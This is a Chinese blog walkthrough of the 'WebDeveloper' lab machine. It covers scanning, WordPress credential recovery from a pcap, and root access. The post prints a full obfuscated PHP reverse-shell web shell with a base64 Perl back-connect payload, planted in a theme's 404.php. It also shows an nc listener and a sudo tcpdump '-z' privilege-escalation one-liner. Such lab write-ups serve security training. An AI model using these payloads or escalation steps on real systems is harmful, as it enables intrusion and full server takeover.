WebDeveloper 渗透实战

作者: 城市烈人 | 来源:发表于2019-04-21 12:00 被阅读170次

靶机IP:192.168.56.104

kali IP:192.168.56.101

nmap全扫

nmap -sS -Pn -A -p- -n 192.168.56.104
image.png

web渗透

既然是wordpress建站,又是杀鸡用牛刀

爆用户名:

http://192.168.56.104/?author=1
image.png

管理员应该就是 WEBDEVELOPER(大小写都有可能)webdeveloper

暂时不爆破,扫下目录

dirb http://192.168.56.104
image.png

探测到一个特殊目录:http://192.168.56.104/ipdata/

image.png

down下该analyze.cap的文件,可以用wireshark打开

以一般渗透的经验,这种抓包,肯定有登录后台admin的HTTP包,直接定位到HTTP的POST包,应该有抓到登录POST的账号和密码

image.png

直接拿到登录的账号密码:

"log" = "webdeveloper"
"pwd" = "Te5eQg&4sBS!Yr$)wf%(DcAd"

登录后台上反弹shell

image.png

wordpress拿站就不用再强调了

后台404挂马

再提供一次这个猥琐的反弹马,自行修改IP和port

<?php 
function which($pr) { 
$path = execute("which $pr"); 
return ($path ? $path : $pr); 
} 
function execute($cfe) { 
$res = ''; 
if ($cfe) { 
if(function_exists('exec')) { 
@exec($cfe,$res); 
$res = join("\n",$res); 
} elseif(function_exists('shell_exec')) { 
$res = @shell_exec($cfe); 
} elseif(function_exists('system')) { 
@ob_start(); 
@system($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(function_exists('passthru')) { 
@ob_start(); 
@passthru($cfe); 
$res = @ob_get_contents(); 
@ob_end_clean(); 
} elseif(@is_resource($f = @popen($cfe,"r"))) { 
$res = ''; 
while(!@feof($f)) { 
$res .= @fread($f,1024); 
} 
@pclose($f); 
} 
} 
return $res; 
} 
function cf($fname,$text){ 
if($fp=@fopen($fname,'w')) { 
@fputs($fp,@base64_decode($text)); 
@fclose($fp); 
} 
} 
$yourip = "192.168.56.101"; 
$yourport = '4444'; 
$usedb = array('perl'=>'perl','c'=>'c'); 
$back_connect="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj". 
"aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR". 
"hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT". 
"sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI". 
"kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi". 
"KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl". 
"OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; 
cf('/tmp/.bc',$back_connect); 
$res = execute(which('perl')." /tmp/.bc $yourip $yourport &"); 
?> 

选择 twentysixteen 这个页面,测试过了 twentyseventeen 会报错,应该是插件拦截的问题


image.png

upload成功后,在kali中开启nc监听

nc -lvp 4444

访问该反弹马的路径:

http://192.168.56.104/wp-content/themes/twentysixteen/404.php
image.png

反弹成功

提权

常规操作,先看下wordpress的配置文件config.php


image.png

找到数据库的账号、密码:

webdeveloper  :   MasterOfTheUniverse

尝试登陆下ssh


image.png

接下来就是提权操作了

翻了数据库,没有没什么可以利用的

sudo -l看一下当前的权限


image.png

发现能以root用户运行/usr/sbin/tcpdump,可以借此提权

查看下help


image.png

tcpdump提权

发现tcpdump这个抓包工具能以root权限执行,便可以将反弹shell以root权限执行从而反弹到kali

现在kali中开启nc监听

1、将之前的反弹shell马写到tmp目录下hack中

echo $'php /var/www/html/wp-content/themes/twentysixteen/404.php' > /tmp/.hack

2、赋权

chmod +x /tmp/.hack

3、sudo 执行tcpdump 反弹到kali

sudo tcpdump -ln -i eth0 -w /dev/null -W 1 -G 1 -z /tmp/.hack -Z root
image.png

直接打到root权限了

get flag:


image.png

总结

1、该靶机web端渗透属于常规操作

2、难点在于发现了tcpdump能以root执行,这个提权操作是第一次接触

靶机百度云下载
链接:https://pan.baidu.com/s/1FIK_G06h-nCg_7BM0UMvkw
提取码:qdhi

相关文章

  • WebDeveloper 渗透实战

    靶机IP:192.168.56.104 kali IP:192.168.56.101 nmap全扫 web渗透 既...

  • 《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下

    《Web渗透技术及实战案例解析.pdf》PDF高清完整版-免费下载 《Web渗透技术及实战案例解析.pdf》PDF...

  • 渗透实战:内网域渗透

    前言 本文记录了一次针对具有二层内网的域环境进行渗透测试的过程,文中涉及了内网域渗透的基本方法、思路和技巧。交替使...

  • MERCY渗透实战

    信息收集 开放的端口服务有: smb枚举探测 139和445的共享服务端口,用enum4linux探测一下 发现q...

  • Sedna渗透实战

    靶机IP:192.168.8.153任务:获取4个flag分别在shell,root,还有靶机中 这个靶机开放了好...

  • RootThis渗透实战

    靶机ip:192.168.8.150 nmap扫端口 单单只开放了80 web服务端口 dir爆目录 小字典不够用...

  • eric渗透实战

    靶机IP :192.168.56.103 nmap扫 靶机比较简单,只开启了22和80端口 nmap探测到了192...

  • SolidState渗透实战

    靶机IP:192.168.218.147 nmap全端口扫 靶机开了一些不明端口 跑目录没发现什么 邮箱渗透 nm...

  • HackInOS渗透实战

    HackInOS渗透实战 该靶机很好玩,上马getshell,msf内网穿透,docker提权,简直帅炸了,无奈我...

  • Lampiao渗透实战

    在Lampiao渗透中,drupal 7的getshell漏洞值得深入学习,有机会自己可以复现,了解一下原理;该靶...

网友评论

    本文标题:WebDeveloper 渗透实战

    本文链接:https://www.haomeiwen.com/subject/leidgqtx.html